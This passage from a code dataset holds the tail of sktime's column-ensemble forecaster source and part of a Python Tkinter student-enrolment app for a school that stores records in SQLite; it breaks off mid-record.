\"fitted\".\n\n        Accesses in self:\n            Fitted model attributes ending in \"_\"\n            self.cutoff\n\n        Parameters\n        ----------\n        fh : guaranteed to be ForecastingHorizon or None, optional (default=None)\n            The forecasting horizon with the steps ahead to predict.\n            If not passed in _fit, guaranteed to be passed here\n        X : pd.DataFrame, optional (default=None)\n            Exogenous time series\n\n        Returns\n        -------\n        y_pred : pd.Series\n            Point predictions\n        \"\"\"\n        return self._by_column(\"predict\", fh=fh, X=X)\n\n    def _predict_quantiles(self, fh=None, X=None, alpha=None):\n        \"\"\"Compute/return prediction quantiles for a forecast.\n\n        private _predict_quantiles containing the core logic,\n        called from predict_quantiles and possibly predict_interval\n\n        State required:\n            Requires state to be \"fitted\".\n\n        Accesses in self:\n            Fitted model attributes ending in \"_\"\n            self.cutoff\n\n        Parameters\n        ----------\n        fh : guaranteed to be ForecastingHorizon\n            The forecasting horizon with the steps ahead to predict.\n        X : optional (default=None)\n            guaranteed to be of a type in self.get_tag(\"X_inner_mtype\")\n            Exogenous time series to predict from.\n        alpha : list of float (guaranteed not None and floats in [0,1] interval)\n            A list of probabilities at which quantile forecasts are computed.\n\n        Returns\n        -------\n        pred_quantiles : pd.DataFrame\n            Column has multi-index: first level 
is variable name from y in fit,\n            second level being the quantile forecasts for each alpha.\n            Quantile forecasts are calculated for each a in alpha.\n            Row index is fh. Entries are quantile forecasts, for var in col index,\n            at quantile probability in second-level col index, for each row index.\n        \"\"\"\n        out = self._by_column(\n            \"predict_quantiles\",\n            fh=fh,\n            X=X,\n            alpha=alpha,\n            col_multiindex=True,\n        )\n        if len(out.columns.get_level_values(0).unique()) == 1:\n            out.columns = out.columns.droplevel(level=0)\n        else:\n            out.columns = out.columns.droplevel(level=1)\n        return out\n\n    def _predict_interval(self, fh=None, X=None, coverage=None):\n        \"\"\"Compute/return prediction quantiles for a forecast.\n\n        private _predict_interval containing the core logic,\n        called from predict_interval and possibly predict_quantiles\n\n        State required:\n            Requires state to be \"fitted\".\n\n        Accesses in self:\n            Fitted model attributes ending in \"_\"\n            self.cutoff\n\n        Parameters\n        ----------\n        fh : guaranteed to be ForecastingHorizon\n            The forecasting horizon with the steps ahead to predict.\n        X : optional (default=None)\n            guaranteed to be of a type in self.get_tag(\"X_inner_mtype\")\n            Exogenous time series to predict from.\n        coverage : list of float (guaranteed not None and floats in [0,1] interval)\n            nominal coverage(s) of predictive interval(s)\n\n        Returns\n        -------\n        pred_int : pd.DataFrame\n            Column has multi-index: first level is variable name from y in fit,\n            second level coverage fractions for which intervals were computed,\n            in the same order as in input `coverage`.\n            Third level is string \"lower\" or \"upper\", for lower/upper interval end.\n            Row index is fh. Entries are forecasts of lower/upper interval end,\n            for var in col index, at nominal coverage in second col index,\n            lower/upper depending on third col index, for the row index.\n            Upper/lower interval end forecasts are equivalent to\n            quantile forecasts at alpha = 0.5 - c/2, 0.5 + c/2 for c in coverage.\n        \"\"\"\n        out = self._by_column(\n            \"predict_interval\",\n            fh=fh,\n            X=X,\n            coverage=coverage,\n            col_multiindex=True,\n        )\n        if len(out.columns.get_level_values(0).unique()) == 1:\n            out.columns = out.columns.droplevel(level=0)\n        else:\n            out.columns = out.columns.droplevel(level=1)\n        return out\n\n    def _predict_var(self, fh, X=None, cov=False):\n        \"\"\"Forecast variance at future horizon.\n\n        private _predict_var containing the core logic, called from predict_var\n\n        Parameters\n        ----------\n        fh : guaranteed to be ForecastingHorizon or None, optional (default=None)\n            The forecasting horizon with the steps ahead to predict.\n            If not passed in _fit, guaranteed to be passed here\n        X : pd.DataFrame, optional (default=None)\n            Exogenous time series\n        cov : bool, optional (default=False)\n            if True, computes covariance matrix forecast.\n            if False, computes marginal variance forecasts.\n\n        Returns\n        -------\n        pred_var : pd.DataFrame, format dependent on `cov` variable\n            If cov=False:\n                Column names are exactly those of `y` passed in `fit`/`update`.\n                For nameless formats, column index will be a RangeIndex.\n                Row index is fh. 
Entries are variance forecasts, for var in col index.\n If cov=True:\n Column index is a multiindex: 1st level is variable names (as above)\n 2nd level is fh.\n Row index is fh.\n Entries are (co-)variance forecasts, for var in col index, and\n covariance between time index in row and col.\n \"\"\"\n return self._by_column(\"predict_var\", fh=fh, X=X, cov=cov, col_multiindex=True)\n\n def _check_forecasters(self, y):\n \"\"\"Check self.forecasters parameter and coerce to (name, est, index).\n\n Checks:\n\n * `self.forecasters` is single forecaster, or\n * `self.forecasters` is list of (name, forecaster, index)\n * all `forecaster` above inherit from `BaseForecaster`\n * `y.columns` is disjoint union of `index` appearing above\n\n Parameters\n ----------\n y : `pandas` object with `columns` attribute of `pd.Index` type\n\n Returns\n -------\n list of (name, estimator, index) such that union of index is `y.columns`;\n and estimator is estimator inheriting from `BaseForecaster`\n\n Raises\n ------\n ValueError if checks fail, with informative error message\n \"\"\"\n return self._check_col_estimators(\n X=y, X_name=\"y\", est_attr=\"forecasters\", cls=BaseForecaster\n )\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n # imports\n from sktime.forecasting.naive import NaiveForecaster\n from sktime.forecasting.trend import TrendForecaster\n\n params1 = {\"forecasters\": NaiveForecaster()}\n params2 = {\"forecasters\": TrendForecaster()}\n\n return [params1, params2]\n", "repo_name": "sktime/sktime", "sub_path": "sktime/forecasting/compose/_column_ensemble.py", "file_name": "_column_ensemble.py", "file_ext": "py", "file_size_in_byte": 15868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7028, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sktime.forecasting.base._meta._HeterogenousEnsembleForecaster", "line_number": 13, "usage_type": "name"}, {"api_name": "sktime.base._meta._ColumnEstimator", "line_number": 13, "usage_type": "name"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 113, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 137, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 144, "usage_type": "argument"}, {"api_name": "sktime.forecasting.base._base.BaseForecaster", "line_number": 382, "usage_type": "name"}, {"api_name": "sktime.forecasting.naive.NaiveForecaster", "line_number": 408, "usage_type": "call"}, {"api_name": "sktime.forecasting.trend.TrendForecaster", "line_number": 409, "usage_type": "call"}]} +{"seq_id": "27558290021", "text": "# coding: utf-8\nimport Tkinter as tk\nimport sqlite3\n\n\nFOOTER_FONT = ('Verdana', '8')\nSMALL_FONT = ('Verdana', '10')\nNORMAL_FONT = ('Verdana', '10', 'bold')\nLARGE_FONT = ('Verdana', '12', 'italic', 
'bold')\nLARGE1_FONT = ('Verdana', '12', 'italic')\nTITLE_FONT = ('Verdana', '14', 'italic', 'bold')\nSUBTITLE_FONT = ('Verdana', '12', 'italic', 'bold')\n\n\n\n\ndef fechapopup(popup, parent, frame):\n\n\tparent.show_frame(frame)\n\tpopup.destroy()\n\n\n\n\n\nclass SecretariaApp(tk.Tk):\n\n\tdef __init__(self, *args, **kwargs):\n\n\t\n\t\ttk.Tk.__init__(self, *args, **kwargs)\n\t\ttk.Tk.wm_title(self, \"Colégio Escolha Certa\")\n\t\t\n\n\t\tcontainer = tk.Frame(self)\n\t\tcontainer.grid()\n\t\tcontainer.grid_rowconfigure(0, weight=1)\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\n\t\tself.frames = {}\n\t\t\n\t\tfor F in (PaginaInicial, Alunos, Turmas, Matricular, Buscar, TodosAlunos):\n\t\t\n\t\t\tframe = F(self, container)\n\t\n\t\t\tself.frames[F] = frame\n\n\t\t\tframe.grid(row=0, column=0, sticky=\"nsew\")\n\t\t\t\n\t\n\t\tself.show_frame(PaginaInicial)\n\n\n\tdef show_frame(self, cont):\n\n\t\n\t\tframe = self.frames[cont]\n\t\tframe.tkraise()\n\n\n\n\nclass PaginaInicial(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tparent.geometry(\"680x500+200+200\")\n\t\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.pack(pady=10, padx=10)\n\n\n\t\tself.botao1 = tk.Button(self, text = 'Alunos', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Alunos))\n\t\tself.botao1.pack()\n\n\t\tself.botao2 = tk.Button(self, text = 'Turmas', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Turmas))\n\t\tself.botao2.pack()\n\n\n\t\tself.botao3 = tk.Button(self, text = 'Sair', fg = 'black', font = LARGE_FONT, height = 3, width = 50, command=quit)\n\t\tself.botao3.pack()\n\n\n\nclass Alunos(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.pack(pady=10, padx=10)\n\n\n\t\tself.label2 = tk.Label(self, text = 'Alunos', fg = 'black', font = SUBTITLE_FONT, height = 3, width = 50)\n\t\tself.label2.focus_force()\t\t\n\t\tself.label2.pack(pady=10, padx=10)\n\n\t\t\n\t\tself.botao1 = tk.Button(self, text = 'Matricular', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Matricular))\n\t\tself.botao1.pack()\n\n\t\tself.botao2 = tk.Button(self, text = 'Buscar Aluno', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(Buscar))\n\t\tself.botao2.pack()\n\n\t\tself.botao3 = tk.Button(self, text = 'Voltar', fg = 'black', font = LARGE_FONT, height = 3, width = 50,command=lambda: parent.show_frame(PaginaInicial))\n\t\tself.botao3.pack()\n\n\n\n\n\n\n\nclass Turmas(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\t\tself.label1 = tk.Label(self, text=\"Visualizar Turmas\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\t\t\n\t\tself.todos = tk.Button(self, text = 'Todos os Alunos', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(TodosAlunos))\n\t\tself.todos.place(x=50, y=73)\n\n\n\t\tself.serie = tk.IntVar()\n\t\tself.serie.set(0)\n\t\tself.turno = 
tk.StringVar()\n\t\tself.turno.set(\"a\")\n\n\t\tself.series = []\n\t\tself.turnos = []\n\n\t\tself.serielabel = tk.Label(self, text=\"Série:*\", font=LARGE1_FONT)\n\t\tself.serielabel.place(x=10, y=150)\n\n\t\tself.turnolabel = tk.Label(self, text=\"Turno:*\", font=LARGE1_FONT)\n\t\tself.turnolabel.place(x=290, y=150)\n\n\n\t\tfor i in range(3):\n\n\t\t\tpos_x = (80+80*i)\n\n\t\t\tself.series.append(tk.Radiobutton(self, text=i+1, value=i+1,state=\"active\", variable=self.serie, font=LARGE1_FONT))\n\t\t\tself.series[i].place(x=pos_x, y= 150)\n\n\t\tTURNO = [(\"Manhã\",0), (\"Tarde\",1)]\n\n\t\tfor turno, indices in TURNO:\n\t\t\n\t\t\tpos_x = (360+120*indices)\n\n\t\t\tself.turnos.append(tk.Radiobutton(self, text=turno, value=turno,state=\"active\", variable=self.turno, font=LARGE1_FONT))\n\t\t\tself.turnos[indices].place(x=pos_x, y= 150)\n\n\t\tself.botaobuscar = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botaobuscar.place(x=250, y=250)\n\n\n\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\tself.botaovoltar.place(x=350, y=250)\n\n\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\tself.legendalabel.place(x=50, y=300)\n\n\t\tdef voltarinicial(self, parent):\n\n\t\t\tself.serie.set(0)\t\n\t\t\tself.turno.set(\"a\")\n\t\t\n\t\t\tparent.show_frame(PaginaInicial)\n\n\t\tdef buscar(self):\n\t\n\t\t\tfor i in range(3):\n\n\t\t\t\tself.series[i].destroy()\n\n\n\t\t\tfor i in range(2):\n\t\t\n\t\t\t\tself.turnos[i].destroy()\n\n\t\t\tself.botaobuscar.destroy()\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.legendalabel.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.turnolabel.destroy()\n\t\t\tself.todos.destroy()\n\n\t\t\tself.serielabel = tk.Label(self, text=\"Série:\", font=LARGE_FONT)\n\t\t\tself.serielabel.place(x=90, y=130)\n\n\t\t\tself.series = tk.Label(self, text=self.serie.get(), font=LARGE_FONT)\n\t\t\tself.series.place(x=190, y=130)\n\n\n\t\t\tself.turnolabel = tk.Label(self, text=\"Turno:\", font=LARGE_FONT)\n\t\t\tself.turnolabel.place(x=290, y=130)\n\n\t\t\tself.turnos = tk.Label(self, text=self.turno.get(), font=LARGE_FONT)\n\t\t\tself.turnos.place(x=400, y=130)\n\n\t\t\tself.matriculalabel = tk.Label(self, text = \"Matrícula\", font=LARGE_FONT)\n\t\t\tself.matriculalabel.place(x=120, y=170)\t\t\n\t\t\n\t\t\tself.matricula = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.matricula.place(x=160,y=200)\n\t\t\n\n\t\t\tself.alunoslabel = tk.Label(self, text = \"Aluno\", font=LARGE_FONT)\n\t\t\tself.alunoslabel.place(x=400, y=170)\n\t\t\n\t\t\tself.alunos = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.alunos.place(x=300,y=200)\n\n\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\t\t\t\n\t\t\tc.execute('SELECT id,nome,turno FROM alunos WHERE serie = ?', [(self.serie.get())])\n\n\t\t\tself.lista = c.fetchall()\t\t\t\n\n\t\t\tmatricula=\"\"\n\t\t\talunos=\"\"\n\n\t\t\t\n\t\t\tfor i in range(len(self.lista)):\n\t\t\n\n\t\t\t\tif self.lista[i][2] == self.turno.get():\t\n\t\t\t\t\tmatricula = matricula+str(self.lista[i][0])+'\\n'\n\t\t\t\t\talunos = alunos+self.lista[i][1]+'\\n'\n\n\n\t\t\tself.matricula[\"text\"] = matricula[0:len(matricula)-1]\n\t\t\tself.alunos[\"text\"] = alunos[0:len(alunos)-1]\n\n\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black',command=lambda: voltar(self, parent))\n\t\t\tself.botaovoltar.place(x=60, y=60)\n\n\t\tdef 
voltar(self, parent):\n\t\t\t\n\t\t\tself.serielabel.destroy()\n\t\t\tself.series.destroy()\n\t\t\tself.turnolabel.destroy()\n\t\t\tself.turnos.destroy()\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.matricula.destroy()\n\t\t\tself.matriculalabel.destroy()\n\t\t\tself.alunos.destroy()\n\t\t\tself.alunoslabel.destroy()\n\t\t\tself.serie.set(0)\n\t\t\tself.turno.set(\"a\")\n\n\t\t\tself.series = []\n\t\t\tself.turnos = []\n\n\t\t\tself.serielabel = tk.Label(self, text=\"Série:*\", font=LARGE1_FONT)\n\t\t\tself.serielabel.place(x=10, y=150)\n\n\t\t\tself.turnolabel = tk.Label(self, text=\"Turno:*\", font=LARGE1_FONT)\n\t\t\tself.turnolabel.place(x=290, y=150)\n\n\t\t\tself.todos = tk.Button(self, text = 'Todos os Alunos', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(TodosAlunos))\n\t\t\tself.todos.place(x=50, y=73)\n\n\n\n\t\t\tfor i in range(3):\n\n\t\t\t\tpos_x = (80+80*i)\n\n\t\t\t\tself.series.append(tk.Radiobutton(self, text=i+1, value=i+1,state=\"active\", variable=self.serie, font=LARGE1_FONT))\n\t\t\t\tself.series[i].place(x=pos_x, y= 150)\n\n\t\t\tTURNO = [(\"Manhã\",0), (\"Tarde\",1)]\n\n\t\t\tfor turno, indices in TURNO:\n\t\t\n\t\t\t\tpos_x = (360+120*indices)\n\n\t\t\t\tself.turnos.append(tk.Radiobutton(self, text=turno, value=turno,state=\"active\", variable=self.turno, font=LARGE1_FONT))\n\t\t\t\tself.turnos[indices].place(x=pos_x, y= 150)\n\n\t\t\tself.botaobuscar = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botaobuscar.place(x=250, y=250)\n\n\n\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\t\tself.botaovoltar.place(x=350, y=250)\n\n\t\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\t\tself.legendalabel.place(x=50, y=300)\n\t\n\n\t\t\t\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\n\n\nclass Matricular(tk.Frame):\n\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tparent.minsize(width= 500, height = 500)\n\n\t\tself.serie = tk.IntVar()\n\t\tself.serie.set(0)\n\t\tself.turno = tk.StringVar()\n\t\tself.turno.set(\"a\")\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\t\tself.label1 = tk.Label(self, text=\"Realizar Matricula\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno: *\", font=SMALL_FONT)\n\t\tself.nomelabel.place(x=50, y=110)\n\n\t\tself.nome = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.nome.place(x=180, y=110)\t\n\n\t\tself.nascimentolabel = tk.Label(self, text=\"Data de Nascimento: *\", font=SMALL_FONT)\n\t\tself.nascimentolabel.place(x=50,y=140)\n\t\n\t\tself.nascimento = tk.Entry(self, width=20, font=SMALL_FONT)\n\t\tself.nascimento.insert(0, \"DD/MM/AAAA\")\n\t\tself.nascimento.place(x=220, y=140)\n\n\t\tself.responsavellabel = tk.Label(self, text=\"Responsável: *\", font=SMALL_FONT)\n\t\tself.responsavellabel.place(x=50,y=170)\n\t\tself.responsavel = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.responsavel.place(x=180,y=170)\n\n\t\tself.serielabel = tk.Label(self, text=\"Série: *\", font=SMALL_FONT)\n\t\tself.serielabel.place(x=50,y=200)\n\t\t\n\t\tself.check1 = tk.Radiobutton(self, text=\"1\", value=1,state=\"active\", variable=self.serie, 
font=SMALL_FONT)\n\t\tself.check1.place(x=180,y=200)\n\n\t\tself.check2 = tk.Radiobutton(self, text=\"2\", value=2,state=\"active\", variable=self.serie, font=SMALL_FONT)\n\t\tself.check2.place(x= 240,y=200)\n\t\tself.check3 = tk.Radiobutton(self, text=\"3\", value=3,state=\"active\", variable=self.serie, font=SMALL_FONT)\n\t\tself.check3.place(x=300,y=200)\n\n\t\tself.turnolabel = tk.Label(self, text=\"Turno: *\", font=SMALL_FONT)\n\t\tself.turnolabel.place(x=50,y=230)\n\t\tself.check4 = tk.Radiobutton(self, text=\"Manhã\", value=\"Manhã\",state=\"active\", variable=self.turno, font=SMALL_FONT)\n\t\tself.check4.place(x=180,y=230)\n\t\tself.check5 = tk.Radiobutton(self, text=\"Tarde\", value=\"Tarde\",state=\"active\", variable=self.turno, font=SMALL_FONT)\n\t\tself.check5.place(x=300,y=230)\n\n\n\t\tself.botao1 = tk.Button(self, text=\"Matricular\",fg = 'black', font=SMALL_FONT,command=lambda: matricular(self, parent))\n\t\tself.botao1.place(x=250,y=260)\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltar(parent))\n\t\tself.botao2.place(x=350, y=260)\n\n\t\tself.legendalabel = tk.Label(self, text=\"(*) Campos obrigatórios\", font=FOOTER_FONT)\n\t\tself.legendalabel.place(x=50, y=300)\n\n\n\t\n\n\t\tdef matricular(self, controller):\n\n\t\t\t\n\t\t\tNOME = self.nome.get().upper()\n\t\t\tNASCIMENTO = self.nascimento.get()\n\t\t\tRESPONSAVEL = self.responsavel.get().upper()\n\n\n\t\t\tif NOME == \"\" or NASCIMENTO == \"\" or RESPONSAVEL == \"\" or self.serie.get() == 0 or self.turno.get() == \"a\":\n\t\t\t\t\n\t\t\t\tcamposvazios()\n\t\t\t\n\t\t\telif NASCIMENTO == \"DD/MM/AAAA\":\n\t\t\t\n\t\t\t\tvalidarnascimento()\n\n\t\t\t\n\t\t\telif len(NASCIMENTO) != 10:\n\t\t\t\t\n\t\t\t\tvalidarnascimento()\n\t\t\t\n\n\t\t\telse:\n\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = connection.cursor()\n\t\t\t\t\n\n\n\t\t\t\tc.execute('CREATE TABLE IF NOT EXISTS alunos (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\tnome TEXT, nascimento TEXT, responsavel TEXT, serie TEXT, turno TEXT)')\n\n\t\t\t\tc.execute('CREATE TABLE IF NOT EXISTS boletim (aluno_id INTEGER, boletim_id TEXT NOT NULL PRIMARY KEY, port INTEGER, mat INTEGER, geo INTEGER, hist INTEGER, bio INTEGER, fis INTEGER, qui INTEGER, FOREIGN KEY(aluno_id) REFERENCES alunos(id))')\n\n\n\n\t\t\t\tc.execute('INSERT INTO alunos (nome, nascimento, responsavel, serie, turno) VALUES(?,?,?,?,?)', (NOME, NASCIMENTO, RESPONSAVEL, self.serie.get(), self.turno.get()))\n\t\t\t\t# use the id generated by this INSERT; selecting it back by name would pick the wrong row when two students share a name\n\t\t\t\tmatricula_id = c.lastrowid\n\t\t\t\tboletim = []\n\t\t\t\tfor i in range(1, 5):\n\t\t\t\t\tboletim.append(str(matricula_id)+str(i))\n\t\t\t\tfor i in range(len(boletim)):\n\t\t\t\t\tc.execute('INSERT INTO boletim (aluno_id, boletim_id) VALUES (?,?)', (matricula_id, boletim[i]))\n\t\t\t\t\t\n\t\t\t\t\n\n\t\t\t\tconnection.commit()\n\t\t\t\tconnection.close()\n\n\n\t\t\t\tself.nome.delete(0, len(NOME))\n\t\t\t\tself.nascimento.delete(0, len(NASCIMENTO))\n\t\t\t\tself.responsavel.delete(0, len(RESPONSAVEL))\n\t\t\t\tself.nascimento.insert(0, \"DD/MM/AAAA\")\n\t\t\t\tself.serie.set(0)\n\t\t\t\tself.turno.set(\"a\")\n\n\t\t\t\t\t\t\t\n\t\t\t\topcao(parent)\n\n\t\tdef voltar(parent):\n\t\t\n\t\t\tself.nome.delete(0, len(self.nome.get()))\n\t\t\tself.nascimento.delete(0, len(self.nascimento.get()))\n\t\t\tself.responsavel.delete(0, len(self.responsavel.get()))\n\t\t\tself.nascimento.insert(0, 
\"DD/MM/AAAA\")\n\t\t\tself.serie.set(0)\n\t\t\tself.turno.set(\"a\")\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\t\n\n\n\t\tdef camposvazios():\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Campos Vazios!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, antes de matricular o aluno preencha os campos vazios!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef validarnascimento():\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Data de nascimento inválida!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, verifique a data de nascimento antes de continuar!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef opcao(parent):\n\t\t\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Matrícula realizada!\")\n\t\t\tlabel = tk.Label(popup, text=\"Deseja realizar outra matricula?\", width = 32)\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Sim\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\t\t\tB2 = tk.Button(popup, text=\"Não\", command=lambda: fechapopup(popup, parent, PaginaInicial))\n\t\t\tB2.grid(row=\"2\",column=\"2\", sticky=\"w\")\n\n\n\n\nclass Buscar(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\n\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\n\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botao1.place(x=250,y=150)\n\t\t\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltarinicial(self, parent))\n\t\tself.botao2.place(x=350, y=150)\n\n\t\t\n\n\t\tdef voltarinicial(self, parent):\n\n\t\t\tself.aluno.delete(0, len(self.aluno.get()))\n\t\t\tparent.show_frame(PaginaInicial)\n\t\t\n\n\t\n\t\t\n\n\t\tdef buscar(self):\n\t\t\t\n\t\n\t\t\tself.matriculalabel = tk.Label(self, text = \"Matrícula\", font=LARGE_FONT)\n\t\t\tself.matriculalabel.place(x=50, y=200)\t\t\n\t\t\n\n\n\n\t\t\tself.matricula = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.matricula.place(x=70,y=230)\n\t\t\n\n\t\t\tself.alunoslabel = tk.Label(self, text = \"Aluno\", font=LARGE_FONT)\n\t\t\tself.alunoslabel.place(x=280, y=200)\n\t\t\n\t\t\tself.alunos = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.alunos.place(x=180,y=230)\n\t\t\t\n\t\t\tself.serielabel = tk.Label(self, text = \"Série\", font=LARGE_FONT)\n\t\t\tself.serielabel.place(x=470, y=200)\n\t\t\t\t\n\t\t\tself.serie = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.serie.place(x=500,y=230)\n\t\t\n\t\t\tself.turnolabel = tk.Label(self, text = \"Turno\", font=LARGE_FONT)\n\t\t\tself.turnolabel.place(x=550, y=200)\n\t\t\n\t\t\tself.turno = tk.Label(self, font=SMALL_FONT)\n\t\t\tself.turno.place(x=550,y=230)\n\t\t\n\n\t\t\tconnection = 
sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\t\t\tnome = self.aluno.get().upper()\n\n\t\t\tc.execute('SELECT id,nome,serie,turno FROM alunos WHERE nome LIKE ?', [('%'+nome+'%')])\n\n\t\t\tself.lista = c.fetchall()\n\t\t\tconnection.close()\n\t\t\tself.mat = tk.IntVar()\n\t\t\tself.mat.set(0)\n\n\t\t\tmatricula=\"\"\n\t\t\talunos=\"\"\n\t\t\tserie= \"\"\n\t\t\tturno= \"\"\n\n\t\t\tself.buttons = []\n\t\t\t# initialize pos_y so the buttons below can still be placed when the search returns no rows\n\t\t\t# (pos_y was previously unbound in that case, raising a NameError)\n\t\t\tpos_y = 230\n\t\t\t\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tpos_x=10\n\t\t\t\tpos_y=230+17*i\n\t\t\n\n\t\t\t\t\n\t\t\t\tmatricula = matricula+str(self.lista[i][0])+'\\n'\n\t\t\t\talunos = alunos+self.lista[i][1]+'\\n'\n\t\t\n\t\n\t\t\t\tserie = serie+str(self.lista[i][2])+ '\\n'\n\t\t\t\tturno = turno+self.lista[i][3]+'\\n'\n\t\t\n\t\t\t\tself.buttons.append(tk.Radiobutton(self, value=self.lista[i][0],state=\"active\", variable=self.mat))\n\t\t\t\tself.buttons[i].place(x=pos_x, y=pos_y)\n\n\n\n\t\n\t\t\tself.boletim = tk.Button(self,text=\"Inserir Notas\", font=SMALL_FONT, command=lambda: editarboletim(self, parent))\n\t\t\tself.boletim.place(x=200, y=pos_y+34)\n\t\t\t\n\t\t\n\n\t\t\tself.inserir = tk.Button(self,text=\"Boletim\", font=SMALL_FONT,command = lambda: visualizar(self))\n\t\t\tself.inserir.place(x=350, y=pos_y+34)\n\t\t\n\t\t\n\t\t\tself.matricula[\"text\"] = matricula[0:len(matricula)-1]\n\t\t\tself.alunos[\"text\"] = 